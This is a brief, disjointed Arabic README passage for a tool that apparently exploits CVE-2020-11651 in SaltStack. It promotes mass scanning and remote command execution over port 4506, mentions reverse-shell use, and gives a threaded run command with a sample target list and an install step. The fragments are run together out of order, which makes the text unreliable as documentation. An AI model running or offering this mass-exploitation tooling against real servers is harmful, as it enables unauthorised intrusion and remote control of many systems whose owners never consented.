
استغلال لثغرة CVE-2020-11651 (SaltStack) مع فحص جماعي، وتنفيذ أوامر عن بُعد، وإصلاحات توافق الصدفة. يدعم فحص الأهداف متعدد الخيوط عبر المنفذ 4506.
--exec؛ كان البرنامج النصي الأصلي يستخدم /bin/sh، لذا فإن بعض الأوامر غير متوافقة مثل قشرة bash العكسية (bash reverse shell).python saltstack.py -b targets_file.txt --threads 16، ومحتوى target_file.txt كما يلي:127.0.0.1:4506
192.168.1.1:4506
pip install salt